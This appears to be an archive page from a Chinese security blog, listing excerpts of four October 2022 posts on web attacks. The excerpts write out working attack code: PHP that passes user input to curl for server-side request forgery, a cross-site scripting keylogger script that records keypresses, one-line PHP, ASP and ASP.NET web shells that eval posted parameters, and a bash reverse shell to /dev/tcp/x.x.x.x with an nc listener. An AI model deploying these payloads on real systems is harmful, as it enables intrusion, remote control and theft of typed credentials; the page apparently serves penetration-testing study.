路漫漫其修远兮
10 2022 档案
摘要:curl、file_get_contents、fsockopen 这三个函数都具有网络请求功能,如果在进行网络请求时,未验证数据的可靠性,那么就可能触发ssrf curl函数在PHP中的使用 <?php $ch=curl_init(); curl_setopt($ch,CURLOPT_URL,$_G
阅读全文
摘要:xss键盘记录 xss插入代码 <script type="text/javascript" src="./log.js"></script> log.js document.onkeypress=function(evt){ evt=evt ? evt : window.event; key=St
阅读全文
摘要:一句话木马 PHP:<?php @eval ($_POST['pass']);?> ASP:<%eval request("pass")%> ASP.NET:<%@ Page Language="Jscript"%><%eval(Request.Item["z"],"unsafe");%> 客户端绕
阅读全文
摘要:Linux中的常见反弹shell 方法一:利用Linux命令 #靶机反弹命令 bash -i >/dev/tcp/x.x.x.x/23333 0>&1 2>&1 #攻击机开始监听 nc -lvp 23333 在系统文件中是不存在/dev/tcp这个文件的,它是一个特殊文件,打开这个文件就类似于发出了
阅读全文
